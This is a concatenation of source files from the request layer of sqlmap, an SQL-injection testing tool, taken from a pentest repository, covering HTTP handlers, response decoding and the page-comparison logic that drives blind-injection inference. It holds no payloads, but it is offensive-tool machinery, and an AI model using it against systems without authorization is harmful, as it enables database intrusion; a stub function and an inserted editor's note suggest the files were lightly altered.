                page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
            except MemoryError:
                page, headers, code = None, None, None
                warnMsg = "site returned insanely large response"
                if kb.testMode:
                    warnMsg += " in testing phase. This is a common "
                    warnMsg += "behavior in custom WAF/IDS/IPS solutions"
                singleTimeWarnMessage(warnMsg)

        if conf.secondOrder:
            page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)

        threadData.lastQueryDuration = calculateDeltaSeconds(start)

        kb.originalCode = kb.originalCode or code

        if kb.testMode:
            kb.testQueryCount += 1

        if timeBasedCompare:
            return wasLastResponseDelayed()
        elif noteResponseTime:
            kb.responseTimes.append(threadData.lastQueryDuration)

        if not response and removeReflection:
            page = removeReflectiveValues(page, payload)

        kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
        kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None

        if content or response:
            return page, headers

        if getRatioValue:
            return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
        else:
            return comparison(page, headers, code, getRatioValue, pageLength)

def setHTTPProxy():  # Cross-linked function
    raise NotImplementedError
46,892
Python
.py
818
42.743276
271
0.581205
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,951
direct.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/direct.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import time

from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import extractExpectedValue
from lib.core.common import getCurrentThreadData
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import isListLike
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.dicts import SQL_STATEMENTS
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.settings import UNICODE_ENCODING
from lib.utils.timeout import timeout

def direct(query, content=True):
    select = True
    query = agent.payloadDirect(query)
    query = agent.adjustLateValues(query)
    threadData = getCurrentThreadData()

    if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper():
        query = "%s FROM DUAL" % query

    for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
        for sqlStatement in sqlStatements:
            if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement":
                select = False
                break

    if select and not query.upper().startswith("SELECT "):
        query = "SELECT %s" % query

    logger.log(CUSTOM_LOGGING.PAYLOAD, query)

    output = hashDBRetrieve(query, True, True)
    start = time.time()

    if not select and "EXEC " not in query.upper():
        _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
    elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query):
        output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)
        hashDBWrite(query, output, True)
    elif output:
        infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20]
        logger.info(infoMsg)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    if not output:
        return output
    elif content:
        if output and isListLike(output):
            if len(output[0]) == 1:
                output = [_[0] for _ in output]

        retVal = getUnicode(output, noneToNull=True)
        return safecharencode(retVal) if kb.safeCharEncode else retVal
    else:
        return extractExpectedValue(output, EXPECTED.BOOL)
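# ---------------------------------------------------------------------
# Editor's note (illustrative addition, not part of the original file):
# the hashDBRetrieve()/hashDBWrite() pair around the connector call in
# direct() above is a plain cache-aside ("resume") pattern. A minimal
# dictionary-backed sketch, with `run_query` as a hypothetical stand-in
# for conf.dbmsConnector.select:

_resume_cache = {}

def _cached_query(query, run_query):
    output = _resume_cache.get(query)
    if output is None:
        output = run_query(query)      # the expensive round trip
        _resume_cache[query] = output  # persisted to the session hashDB in the real code
    else:
        logger.info("resumed: %s..." % getUnicode(output)[:20])
    return output
# ---------------------------------------------------------------------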
2,667
Python
.py
61
38.52459
109
0.730146
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,952
basic.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/basic.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import codecs
import gzip
import logging
import re
import StringIO
import struct
import zlib

from lib.core.common import extractErrorMessage
from lib.core.common import extractRegexResult
from lib.core.common import getPublicTypeMembers
from lib.core.common import getUnicode
from lib.core.common import readInput
from lib.core.common import resetCookieJar
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import HTTP_HEADER
from lib.core.enums import PLACE
from lib.core.exception import SqlmapCompressionException
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import EVENTVALIDATION_REGEX
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
from lib.core.settings import ML
from lib.core.settings import META_CHARSET_REGEX
from lib.core.settings import PARSE_HEADERS_LIMIT
from lib.core.settings import VIEWSTATE_REGEX
from lib.parse.headers import headersParser
from lib.parse.html import htmlParser
from lib.utils.htmlentities import htmlEntities
from thirdparty.chardet import detect
from thirdparty.odict.odict import OrderedDict

def forgeHeaders(items=None):
    """
    Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing
    the HTTP requests
    """

    items = items or {}

    for _ in items.keys():
        if items[_] is None:
            del items[_]

    headers = OrderedDict(conf.httpHeaders)
    headers.update(items.items())

    class _str(str):
        def capitalize(self):
            return _str(self)

        def title(self):
            return _str(self)

    _ = headers
    headers = OrderedDict()
    for key, value in _.items():
        success = False

        if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
            try:
                headers[_str(key)] = value  # dirty hack for http://bugs.python.org/issue12455
            except UnicodeEncodeError:  # don't do the hack on non-ASCII header names (they have to be properly encoded later on)
                pass
            else:
                success = True

        if not success:
            key = '-'.join(_.capitalize() for _ in key.split('-'))
            headers[key] = value

    if conf.cj:
        if HTTP_HEADER.COOKIE in headers:
            for cookie in conf.cj:
                if cookie.domain_specified and not conf.hostname.endswith(cookie.domain):
                    continue

                if ("%s=" % cookie.name) in headers[HTTP_HEADER.COOKIE]:
                    if conf.loadCookies:
                        conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders))
                    elif kb.mergeCookies is None:
                        message = "you provided a HTTP %s header value. " % HTTP_HEADER.COOKIE
                        message += "The target URL provided its own cookies within "
                        message += "the HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE
                        message += "Do you want to merge them in further requests? [Y/n] "
                        _ = readInput(message, default="Y")
                        kb.mergeCookies = not _ or _[0] in ("y", "Y")

                    if kb.mergeCookies:
                        _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
                        headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])

                        if PLACE.COOKIE in conf.parameters:
                            conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE])

                        conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders]

                elif not kb.testMode:
                    headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))

        if kb.testMode and not conf.csrfToken:
            resetCookieJar(conf.cj)

    return headers

def parseResponse(page, headers):
    """
    @param page: the page to parse to feed the knowledge base htmlFp
    (back-end DBMS fingerprint based upon DBMS error messages return
    through the web application) list and absFilePaths (absolute file
    paths) set.
    """

    if headers:
        headersParser(headers)

    if page:
        htmlParser(page)

def checkCharEncoding(encoding, warn=True):
    """
    Checks encoding name, repairs common misspellings and adjusts to
    proper namings used in codecs module

    >>> checkCharEncoding('iso-8858', False)
    'iso8859-1'
    >>> checkCharEncoding('en_us', False)
    'utf8'
    """

    if encoding:
        encoding = encoding.lower()
    else:
        return encoding

    # Reference: http://www.destructor.de/charsets/index.htm
    translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk"}

    for delimiter in (';', ',', '('):
        if delimiter in encoding:
            encoding = encoding[:encoding.find(delimiter)].strip()

    # popular typos/errors
    if "8858" in encoding:
        encoding = encoding.replace("8858", "8859")  # iso-8858 -> iso-8859
    elif "8559" in encoding:
        encoding = encoding.replace("8559", "8859")  # iso-8559 -> iso-8859
    elif "5889" in encoding:
        encoding = encoding.replace("5889", "8859")  # iso-5889 -> iso-8859
    elif "5589" in encoding:
        encoding = encoding.replace("5589", "8859")  # iso-5589 -> iso-8859
    elif "2313" in encoding:
        encoding = encoding.replace("2313", "2312")  # gb2313 -> gb2312
    elif encoding.startswith("x-"):
        encoding = encoding[len("x-"):]  # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish
    elif "windows-cp" in encoding:
        encoding = encoding.replace("windows-cp", "windows")  # windows-cp-1254 -> windows-1254

    # name adjustment for compatibility
    if encoding.startswith("8859"):
        encoding = "iso-%s" % encoding
    elif encoding.startswith("cp-"):
        encoding = "cp%s" % encoding[3:]
    elif encoding.startswith("euc-"):
        encoding = "euc_%s" % encoding[4:]
    elif encoding.startswith("windows") and not encoding.startswith("windows-"):
        encoding = "windows-%s" % encoding[7:]
    elif encoding.find("iso-88") > 0:
        encoding = encoding[encoding.find("iso-88"):]
    elif encoding.startswith("is0-"):
        encoding = "iso%s" % encoding[4:]
    elif encoding.find("ascii") > 0:
        encoding = "ascii"
    elif encoding.find("utf8") > 0:
        encoding = "utf8"

    # Reference: http://philip.html5.org/data/charsets-2.html
    if encoding in translate:
        encoding = translate[encoding]
    elif encoding in ("null", "{charset}", "*"):
        return None

    # Reference: http://www.iana.org/assignments/character-sets
    # Reference: http://docs.python.org/library/codecs.html
    try:
        codecs.lookup(encoding)
    except LookupError:
        if warn:
            warnMsg = "unknown web page charset '%s'. " % encoding
            warnMsg += "Please report by e-mail to %s." % ML
            singleTimeLogMessage(warnMsg, logging.WARN, encoding)
        encoding = None

    return encoding

def getHeuristicCharEncoding(page):
    """
    Returns page encoding charset detected by usage of heuristics
    Reference: http://chardet.feedparser.org/docs/
    """

    retVal = detect(page)["encoding"]

    if retVal:
        infoMsg = "heuristics detected web page charset '%s'" % retVal
        singleTimeLogMessage(infoMsg, logging.INFO, retVal)

    return retVal

def decodePage(page, contentEncoding, contentType):
    """
    Decode compressed/charset HTTP response
    """

    if not page or (conf.nullConnection and len(page) < 2):
        return getUnicode(page)

    if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"):
        if not kb.pageCompress:
            return None

        try:
            if contentEncoding.lower() == "deflate":
                data = StringIO.StringIO(zlib.decompress(page, -15))  # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations
            else:
                data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page))
                size = struct.unpack("<l", page[-4:])[0]  # Reference: http://pydoc.org/get.cgi/usr/local/lib/python2.5/gzip.py
                if size > MAX_CONNECTION_TOTAL_SIZE:
                    raise Exception("size too large")

            page = data.read()
        except Exception, msg:
            errMsg = "detected invalid data for declared content "
            errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg)
            singleTimeLogMessage(errMsg, logging.ERROR)

            warnMsg = "turning off page compression"
            singleTimeWarnMessage(warnMsg)

            kb.pageCompress = False
            raise SqlmapCompressionException

    if not conf.charset:
        httpCharset, metaCharset = None, None

        # Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode
        if contentType and (contentType.find("charset=") != -1):
            httpCharset = checkCharEncoding(contentType.split("charset=")[-1])

        metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))

        if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
          or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
            kb.pageEncoding = httpCharset or metaCharset
            debugMsg = "declared web page charset '%s'" % kb.pageEncoding
            singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
        else:
            kb.pageEncoding = None
    else:
        kb.pageEncoding = conf.charset

    # can't do for all responses because we need to support binary files too
    if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
        # e.g. &#195;&#235;&#224;&#226;&#224;
        if "&#" in page:
            page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)

        # e.g. %20%28%29
        if "%" in page:
            page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)

        # e.g. &amp;
        page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)

        kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
        page = getUnicode(page, kb.pageEncoding)

        # e.g. &#8217;&#8230;&#8482;
        if "&#" in page:
            def _(match):
                retVal = match.group(0)
                try:
                    retVal = unichr(int(match.group(1)))
                except ValueError:
                    pass
                return retVal
            page = re.sub(r"&#(\d+);", _, page)

        # e.g. &zeta;
        page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)

    return page

def processResponse(page, responseHeaders):
    kb.processResponseCounter += 1

    parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)

    if conf.parseErrors:
        msg = extractErrorMessage(page)

        if msg:
            logger.warning("parsed DBMS error message: '%s'" % msg)

    if kb.originalPage is None:
        for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX):
            match = re.search(regex, page)

            if match and PLACE.POST in conf.parameters:
                name, value = match.groups()

                if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]:
                    if conf.paramDict[PLACE.POST][name] in page:
                        continue
                    conf.paramDict[PLACE.POST][name] = value

                conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
12,679
Python
.py
264
39.022727
250
0.628257
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
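The checkCharEncoding routine in the record above is essentially a name-normalization pipeline: lowercase, strip parameter suffixes, repair known typos, then verify the result against the codecs registry. A minimal standalone sketch of that pipeline (the translation table here is an illustrative subset, not sqlmap's full mapping):

import codecs

def normalize_charset(name):
    """Return a codecs-compatible encoding name, or None if unusable."""
    if not name:
        return None
    name = name.lower().split(';')[0].split(',')[0].strip()
    name = name.replace("8858", "8859")            # common typo: iso-8858 -> iso-8859
    if name.startswith("x-"):                      # x-euc-kr -> euc-kr
        name = name[len("x-"):]
    name = {"unicode": "utf8", "ansi": "ascii"}.get(name, name)   # subset of the table above
    try:
        codecs.lookup(name)
    except LookupError:
        return None
    return name

print(normalize_charset("ISO-8858-1; q=0.9"))      # -> iso-8859-1
print(normalize_charset("{charset}"))              # -> None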
18,953
rangehandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/rangehandler.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import urllib
import urllib2

from lib.core.exception import SqlmapConnectionException

class HTTPRangeHandler(urllib2.BaseHandler):
    """
    Handler that enables HTTP Range headers.

    Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file

    The Range header is an HTTP feature to begin with, so all this class does
    is tell urllib2 that a "206 Partial Content" response from the HTTP
    server is what we expected.

    Example:
        import urllib2

        range_handler = HTTPRangeHandler()
        opener = urllib2.build_opener(range_handler)

        # install it
        urllib2.install_opener(opener)

        # create Request and set Range header
        req = urllib2.Request('http://www.python.org/')
        req.add_header('Range', 'bytes=30-50')
        f = urllib2.urlopen(req)
    """

    def http_error_206(self, req, fp, code, msg, hdrs):
        # 206 Partial Content Response
        r = urllib.addinfourl(fp, hdrs, req.get_full_url())
        r.code = code
        r.msg = msg
        return r

    def http_error_416(self, req, fp, code, msg, hdrs):
        # HTTP's Range Not Satisfiable error
        errMsg = "Invalid range"
        raise SqlmapConnectionException(errMsg)
1,443
Python
.py
38
31.710526
84
0.685571
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
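For readers on Python 3, where urllib2 is gone and urllib.request already treats any 2xx status (including 206) as success, a hedged equivalent of the docstring's example with example.com as a placeholder target:

import urllib.request

req = urllib.request.Request("http://example.com/")
req.add_header("Range", "bytes=0-99")              # request only the first 100 bytes
resp = urllib.request.urlopen(req)
print(resp.status)                                  # 206 if the server honours Range, else 200
print(len(resp.read()))                             # at most 100 bytes on a 206 response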
18,954
httpshandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/httpshandler.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import httplib
import socket
import urllib2

from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException

ssl = None
try:
    import ssl as _ssl
    ssl = _ssl
except ImportError:
    pass

_protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]

class HTTPSConnection(httplib.HTTPSConnection):
    """
    Connection class that enables usage of newer SSL protocols.

    Reference: http://bugs.python.org/msg128686
    """

    def __init__(self, *args, **kwargs):
        httplib.HTTPSConnection.__init__(self, *args, **kwargs)

    def connect(self):
        def create_sock():
            sock = socket.create_connection((self.host, self.port), self.timeout)
            if getattr(self, "_tunnel_host", None):
                self.sock = sock
                self._tunnel()
            return sock

        success = False

        for protocol in _protocols:
            try:
                sock = create_sock()
                _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
                if _:
                    success = True
                    self.sock = _
                    _protocols.remove(protocol)
                    _protocols.insert(0, protocol)
                    break
                else:
                    sock.close()
            except ssl.SSLError, errMsg:
                logger.debug("SSL connection error occurred ('%s')" % errMsg)

        if not success:
            raise SqlmapConnectionException("can't establish SSL connection")

class HTTPSHandler(urllib2.HTTPSHandler):
    def https_open(self, req):
        return self.do_open(HTTPSConnection if ssl else httplib.HTTPSConnection, req)

# Bug fix (http://bugs.python.org/issue17849)

def _(self, *args):
    return self._readline()

httplib.LineAndFileWrapper._readline = httplib.LineAndFileWrapper.readline
httplib.LineAndFileWrapper.readline = _
2,073
Python
.py
56
28.660714
94
0.632184
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
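httpshandler.py's connect() loop tries each protocol constant until a handshake succeeds, then promotes the winner to the front of _protocols so later connections try it first. The SSLv3-era constants are long gone from the modern ssl module, but the same newest-to-oldest fallback can be sketched with TLS version pins (a hypothetical helper, not sqlmap code):

import socket
import ssl

def connect_with_fallback(host, port=443, timeout=10):
    """Try TLS versions newest-first until one handshake succeeds."""
    for version in (ssl.TLSVersion.TLSv1_3, ssl.TLSVersion.TLSv1_2):
        ctx = ssl.create_default_context()
        ctx.minimum_version = ctx.maximum_version = version   # pin a single version
        sock = socket.create_connection((host, port), timeout)
        try:
            return ctx.wrap_socket(sock, server_hostname=host)
        except ssl.SSLError:
            sock.close()                                      # handshake failed, try older
    raise OSError("no mutually supported TLS version")

# tls = connect_with_fallback("example.com"); print(tls.version())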
18,955
comparison.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/comparison.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import re

from lib.core.common import extractRegexResult
from lib.core.common import getFilteredPageContent
from lib.core.common import listToStrValue
from lib.core.common import removeDynamicContent
from lib.core.common import wasLastResponseDBMSError
from lib.core.common import wasLastResponseHTTPError
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import DEFAULT_PAGE_ENCODING
from lib.core.settings import DIFF_TOLERANCE
from lib.core.settings import HTML_TITLE_REGEX
from lib.core.settings import MIN_RATIO
from lib.core.settings import MAX_RATIO
from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import LOWER_RATIO_BOUND
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.threads import getCurrentThreadData

def comparison(page, headers, code=None, getRatioValue=False, pageLength=None):
    _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue)
    return _

def _adjust(condition, getRatioValue):
    if not any((conf.string, conf.notString, conf.regexp, conf.code)):
        # Negative logic is applied in the raw page comparison scheme: whatever
        # differs from the original PAYLOAD.WHERE.NEGATIVE response is
        # considered True. In the switch-based approach negative logic is not
        # applied, because whatever the user defines as True is exactly what
        # the comparison mechanism itself returns.
        retVal = not condition if kb.negativeLogic and condition is not None and not getRatioValue else condition
    else:
        retVal = condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)

    return retVal

def _comparison(page, headers, code, getRatioValue, pageLength):
    threadData = getCurrentThreadData()

    if kb.testMode:
        threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else ""
        threadData.lastComparisonPage = page

    if page is None and pageLength is None:
        return None

    seqMatcher = threadData.seqMatcher
    seqMatcher.set_seq1(kb.pageTemplate)

    if any((conf.string, conf.notString, conf.regexp)):
        rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page)

        # String to match in page when the query is True and/or valid
        if conf.string:
            return conf.string in rawResponse

        # String to match in page when the query is False and/or invalid
        if conf.notString:
            return conf.notString not in rawResponse

        # Regular expression to match in page when the query is True and/or valid
        if conf.regexp:
            return re.search(conf.regexp, rawResponse, re.I | re.M) is not None

    # HTTP code to match when the query is valid
    if conf.code:
        return conf.code == code

    if page:
        # In case of a DBMS error page return None
        if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()):
            return None

        # Dynamic content lines to be excluded before comparison
        if not kb.nullConnection:
            page = removeDynamicContent(page)
            seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))

        if not pageLength:
            pageLength = len(page)

    if kb.nullConnection and pageLength:
        if not seqMatcher.a:
            errMsg = "problem occurred while retrieving original page content "
            errMsg += "which prevents sqlmap from continuing. Please rerun, "
            errMsg += "and if the problem persists turn off any optimization switches"
            raise SqlmapNoneDataException(errMsg)

        ratio = 1. * pageLength / len(seqMatcher.a)

        if ratio > 1.:
            ratio = 1. / ratio
    else:
        # Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
        # (e.g. if one page is PDF and the other is HTML)
        if isinstance(seqMatcher.a, str) and isinstance(page, unicode):
            page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
        elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
            seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')

        seq1, seq2 = None, None

        if conf.titles:
            seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a)
            seq2 = extractRegexResult(HTML_TITLE_REGEX, page)
        else:
            seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a
            seq2 = getFilteredPageContent(page, True) if conf.textOnly else page

        if seq1 is None or seq2 is None:
            return None

        seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
        seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")

        count = 0
        while count < min(len(seq1), len(seq2)):
            if seq1[count] == seq2[count]:
                count += 1
            else:
                break

        if count:
            seq1 = seq1[count:]
            seq2 = seq2[count:]

        seqMatcher.set_seq1(seq1)
        seqMatcher.set_seq2(seq2)

        ratio = round(seqMatcher.quick_ratio(), 3)

    # If the url is stable and we did not yet set the match ratio and the
    # current injected value changes the url page content
    if kb.matchRatio is None:
        if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
            kb.matchRatio = ratio
            logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)

    # If it has been requested to return the ratio and not a comparison
    # response
    if getRatioValue:
        return ratio
    elif ratio > UPPER_RATIO_BOUND:
        return True
    elif kb.matchRatio is None:
        return None
    else:
        return (ratio - kb.matchRatio) > DIFF_TOLERANCE
6,090
Python
.py
126
40.722222
113
0.699039
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
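The heart of _comparison() above is difflib's SequenceMatcher: after stripping dynamic content, reflected values, and the common prefix, quick_ratio() scores the injected page against the template, and the first in-bounds score becomes kb.matchRatio for later drift checks. A toy demonstration of the scoring step (the pages are invented):

import difflib

def page_ratio(template, page):
    """Similarity in [0, 1], rounded to three decimals like the code above."""
    matcher = difflib.SequenceMatcher(None, template, page)
    return round(matcher.quick_ratio(), 3)

template = "<html><body>Welcome back, visitor. Items: 42</body></html>"
true_page = "<html><body>Welcome back, visitor. Items: 43</body></html>"
false_page = "<html><body>Error: incorrect syntax near ''</body></html>"

print(page_ratio(template, true_page))    # high score -> above UPPER_RATIO_BOUND, treated as True
print(page_ratio(template, false_page))   # low score -> judged against kb.matchRatio and DIFF_TOLERANCE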
18,956
basicauthhandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/basicauthhandler.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import urllib2

class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
    """
    Reference: http://selenic.com/hg/rev/6c51a5056020
    Fix for http://bugs.python.org/issue8797
    """

    def __init__(self, *args, **kwargs):
        urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs)
        self.retried_req = set()
        self.retried_count = 0

    def reset_retry_count(self):
        # Python 2.6.5 will call this on 401 or 407 errors and thus loop
        # forever. We disable reset_retry_count completely and reset in
        # http_error_auth_reqed instead.
        pass

    def http_error_auth_reqed(self, auth_header, host, req, headers):
        # Reset the retry counter once for each request.
        if hash(req) not in self.retried_req:
            self.retried_req.add(hash(req))
            self.retried_count = 0
        else:
            if self.retried_count > 5:
                raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None)
            else:
                self.retried_count += 1

        return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(
            self, auth_header, host, req, headers)
1,377
Python
.py
33
32.909091
85
0.625561
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
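The essence of the fix above: remember each request that has already been retried and enforce an absolute cap, instead of letting Python reset the counter on every 401. The same guard, reduced to a hypothetical standalone class:

class RetryGuard(object):
    """Cap authentication retries per request to break 401 loops."""

    def __init__(self, limit=5):
        self.limit = limit
        self.attempts = {}

    def should_retry(self, request_id):
        count = self.attempts.get(request_id, 0)
        self.attempts[request_id] = count + 1
        return count < self.limit

guard = RetryGuard()
for attempt in range(10):
    if not guard.should_retry("GET http://example.com/"):
        print("giving up after %d failed auth attempts" % guard.limit)
        break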
18,957
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,958
pkihandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/pkihandler.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import httplib
import urllib2

from lib.core.data import conf

class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
    def __init__(self, key_file):
        urllib2.HTTPSHandler.__init__(self)
        self.key_file = key_file

    def https_open(self, req):
        return self.do_open(self.getConnection, req)

    def getConnection(self, host, timeout=None):
        return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout)
594
Python
.py
16
33
90
0.729021
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
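pkihandler.py predates ssl.SSLContext; on Python 3 the same client-certificate authentication is a context option rather than a custom handler. A hedged sketch, with client.pem and client.key as placeholder paths:

import http.client
import ssl

ctx = ssl.create_default_context()
ctx.load_cert_chain(certfile="client.pem", keyfile="client.key")   # placeholder credentials

conn = http.client.HTTPSConnection("example.com", context=ctx, timeout=30)
conn.request("GET", "/")
print(conn.getresponse().status)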
18,959
dns.py
